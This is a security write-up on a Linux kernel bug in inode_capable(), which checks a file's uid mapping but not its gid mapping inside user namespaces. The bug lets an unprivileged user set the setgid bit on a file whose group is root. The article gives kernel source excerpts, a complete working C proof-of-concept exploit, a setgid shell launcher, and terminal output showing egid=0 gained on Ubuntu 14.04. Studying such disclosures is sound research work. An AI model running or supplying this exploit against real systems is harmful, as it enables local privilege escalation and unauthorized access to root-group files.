The CLONE_NEWUSER namespace was introduced in Linux 2.6.23 and completed in Linux 3.8 (and starting from 3.8, unprivileged processes can create user namespaces). It is used to isolate the user and group ID number spaces, i.e., a process's user and group IDs can be different inside and outside a user namespace. For example, a normal (unprivileged) process can create a namespace in which it has a uid of 0.
Hence, a mapping from the user and group IDs inside a user namespace to a corresponding set of user and group IDs outside the namespace is required. This mapping allows the OS to perform the appropriate permission checks when a process in a user namespace performs operations that affect the system outside that namespace, e.g., file system access. However, a number of Linux filesystems are not yet "fully" user-namespace aware.
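To make the mapping idea concrete, here is a minimal userspace sketch of how one line of /proc/<pid>/uid_map (inside ID, outside ID, count) can be interpreted. The names id_extent, map_id_to_outside and outside_id_has_mapping are hypothetical and only model the concept; this is not the kernel's implementation.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define ID_UNMAPPED ((uint32_t) -1)

/* Models one line of /proc/<pid>/uid_map: "<inside> <outside> <count>".
 * Hypothetical type for illustration only. */
struct id_extent {
    uint32_t inside;   /* first ID as seen inside the namespace */
    uint32_t outside;  /* first ID as seen outside the namespace */
    uint32_t count;    /* number of consecutive IDs covered */
};

/* Translate an ID seen inside the namespace to the ID outside it.
 * Returns ID_UNMAPPED if no extent covers the ID. */
static uint32_t map_id_to_outside(const struct id_extent *map, size_t n,
                                  uint32_t id)
{
    for (size_t i = 0; i < n; i++) {
        if (id >= map[i].inside && id - map[i].inside < map[i].count)
            return map[i].outside + (id - map[i].inside);
    }
    return ID_UNMAPPED;
}

/* Does an ID from outside the namespace have a representation inside it?
 * This is the question a "has mapping" style check asks about a file's
 * owner or group. */
static int outside_id_has_mapping(const struct id_extent *map, size_t n,
                                  uint32_t id)
{
    for (size_t i = 0; i < n; i++) {
        if (id >= map[i].outside && id - map[i].outside < map[i].count)
            return 1;
    }
    return 0;
}
```

With a single extent { 0, 1001, 1 }, uid 0 inside the namespace is uid 1001 outside, and uid 0 outside the namespace has no mapping at all.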
The bug is in the incorrect use of inode_capable(), which decides whether the caller holds a given capability over an inode. Let's take a look at the inode_change_ok() function, which uses inode_capable() to check that the caller has sufficient privileges to perform chown, chgrp and chmod operations:
int inode_change_ok(const struct inode *inode, struct iattr *attr)
{
    ....
    /* If force is set do it anyway. */
    if (ia_valid & ATTR_FORCE)
        return 0;

    /* Make sure a caller can chown. */
    if ((ia_valid & ATTR_UID) &&
        (!uid_eq(current_fsuid(), inode->i_uid) ||
         !uid_eq(attr->ia_uid, inode->i_uid)) &&
        !inode_capable(inode, CAP_CHOWN))
        return -EPERM;

    /* Make sure caller can chgrp. */
    ....

    /* Make sure a caller can chmod. */
    if (ia_valid & ATTR_MODE) {
        if (!inode_owner_or_capable(inode))              /* (1) */
            return -EPERM;
        /* Also check the setgid bit! */
        if (!in_group_p((ia_valid & ATTR_GID) ? attr->ia_gid :
                        inode->i_gid) &&
            !inode_capable(inode, CAP_FSETID))           /* (2) */
            attr->ia_mode &= ~S_ISGID;
    }
At (2), inode_capable() is called with CAP_FSETID. inode_capable() is then supposed to check whether the caller is allowed to perform the chmod operation based on the mapping to uid and gid outside the namespace:
bool inode_capable(const struct inode *inode, int cap)
{
    struct user_namespace *ns = current_user_ns();

    return ns_capable(ns, cap) && kuid_has_mapping(ns, inode->i_uid);   /* (3) */
}
However, as can be seen at (3), the check is only performed for inode->i_uid (and not for inode->i_gid). What that means is that if we own a file as a non-privileged user (outside the namespace) with gid set to 0 (how can that happen?), we can set the setgid bit on that file due to the missing inode->i_gid check above. But yes, we do need to own the file in the first place (i.e., its uid must be ours) because of the inode_owner_or_capable() check at (1):
bool inode_owner_or_capable(const struct inode *inode)
{
    if (uid_eq(current_fsuid(), inode->i_uid))
        return true;
    if (inode_capable(inode, CAP_FOWNER))
        return true;
    return false;
}
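The difference between checking only the uid and checking both IDs can be sketched in userspace. The model below is an assumption-laden illustration: struct model_ns, struct model_inode and the model_* functions are hypothetical stand-ins for kernel state, and the namespace is simplified to at most one mapped uid and one mapped gid.

```c
#include <assert.h>
#include <stdbool.h>

/* Hypothetical stand-in for a user namespace with at most one mapped
 * uid and one mapped gid (as in a "0 <uid> 1" map). */
struct model_ns {
    bool caller_has_cap;   /* what ns_capable(ns, cap) would report */
    unsigned mapped_uid;   /* the outside uid present in uid_map */
    bool has_gid_map;      /* false if gid_map was never written */
    unsigned mapped_gid;   /* the outside gid present in gid_map */
};

/* Hypothetical stand-in for the two inode fields that matter here. */
struct model_inode {
    unsigned uid;
    unsigned gid;
};

static bool model_uid_has_mapping(const struct model_ns *ns, unsigned uid)
{
    return uid == ns->mapped_uid;
}

static bool model_gid_has_mapping(const struct model_ns *ns, unsigned gid)
{
    return ns->has_gid_map && gid == ns->mapped_gid;
}

/* Mirrors the check at (3): only the inode's uid is considered. */
static bool model_capable_uid_only(const struct model_ns *ns,
                                   const struct model_inode *inode)
{
    return ns->caller_has_cap && model_uid_has_mapping(ns, inode->uid);
}

/* Same check with the gid condition the article says is missing. */
static bool model_capable_uid_and_gid(const struct model_ns *ns,
                                      const struct model_inode *inode)
{
    return ns->caller_has_cap &&
           model_uid_has_mapping(ns, inode->uid) &&
           model_gid_has_mapping(ns, inode->gid);
}
```

For a namespace that maps only uid 1001 and a file owned by 1001:0, the uid-only variant grants the capability while the uid-and-gid variant refuses it, which is exactly the gap described above.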
The following PoC demonstrates the exploitation technique.
For this example, I'll be using Ubuntu 14.04:
vnik$ uname -a
Linux ubuntu 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64
First, let's assume there is a file owned by us (vnik) with gid of 0:
vnik$ id
uid=1001(vnik) gid=1001(vnik) groups=1001(vnik)
vnik$ ls -al test
-rw-rw-r-- 1 vnik root 0 Jun 19 13:59 test
So, the gid is root and there are no setuid or setgid bits set. Let's create a user namespace where our user is mapped to root.
#define _GNU_SOURCE
#include <sys/wait.h>
#include <sys/stat.h>
#include <sched.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <limits.h>
#include <string.h>
#include <assert.h>

#define STACK_SIZE (1024 * 1024)

static char child_stack[STACK_SIZE];

struct args {
    int pipe_fd[2];
    char *file_path;
};

static int child(void *arg)
{
    struct args *f_args = (struct args *)arg;
    char c;

    // close our copy of the pipe's write end, then block until the
    // parent closes its copy (read() returns 0 on EOF)
    close(f_args->pipe_fd[1]);
    assert(read(f_args->pipe_fd[0], &c, 1) == 0);

    // set the setgid bit
    chmod(f_args->file_path,
          S_ISGID|S_IRUSR|S_IWUSR|S_IRGRP|S_IXGRP|S_IXUSR);      /* (5) */

    return 0;
}

int main(int argc, char *argv[])
{
    int fd;
    pid_t pid;
    char mapping[1024];
    char map_file[PATH_MAX];
    struct args f_args;

    assert(argc == 2);
    f_args.file_path = argv[1];

    // create a pipe for synching the child and parent
    assert(pipe(f_args.pipe_fd) != -1);

    pid = clone(child, child_stack + STACK_SIZE,
                CLONE_NEWUSER | SIGCHLD, &f_args);               /* (3) */
    assert(pid != -1);

    // map uid 0 inside the namespace to our uid outside of it
    snprintf(mapping, sizeof(mapping), "0 %ld 1\n", (long) getuid());

    // update the uid map of the child (the gid map is left untouched)
    snprintf(map_file, PATH_MAX, "/proc/%ld/uid_map", (long) pid);
    fd = open(map_file, O_RDWR);
    assert(fd != -1);
    assert(write(fd, mapping, strlen(mapping)) ==
           (ssize_t) strlen(mapping));                           /* (4) */
    close(fd);

    // closing the write end lets the child proceed
    close(f_args.pipe_fd[1]);
    assert(waitpid(pid, NULL, 0) != -1);

    return 0;
}
The above code creates a user namespace (3) with a mapping (4) for the current user (outside the namespace) to uid 0 (inside the namespace). The child process within the new namespace then sets the setgid bit (5) on the supplied file. Since there is no check for kgid_has_mapping(ns, inode->i_gid) in inode_capable(), we can set the setgid bit on a file with an arbitrary gid value (even if we don't belong to that group outside the namespace). The above PoC can be downloaded from here.
vnik$ gcc poc.c -o poc
Let's now create a simple shell launcher that we'll use to overwrite the test file:
vnik$ cat << EOF > shell.c
#include <unistd.h>

int main()
{
    setgid(0);
    execl("/bin/bash", "-sh", (char *) NULL);
    return 1;
}
EOF
vnik$ gcc shell.c -o shell
vnik$ cp shell test && ls -al ./test
-rw-r--r-- 1 vnik root 8564 Jun 20 13:20 test
Now that we've replaced the test file with our shell (preserving the gid), let's set the setgid bit:
vnik$ ./poc ./test
vnik$ ls -al ./test
-rwxr-s--- 1 vnik root 8564 Jun 20 13:20 test
vnik$ ./test
-sh-4.3$ id
uid=1000(vnik) gid=1000(vnik) egid=0(root) groups=1000(vnik)
We have egid = 0. Whoopty doo! Yes, we can now read and write files (that were previously only readable or writable by gid = 0) but that does not directly lead to root.
The vulnerable kernel versions do not use inode_capable() correctly when determining the caller's capabilities. A non-privileged user "may" be able to escalate privileges to root. However, good luck finding a file owned by your user with gid = 0 (or whatever gid you're targeting). Once you get egid = 0, what's next? Can we escalate this to root in a generic or distribution-specific way?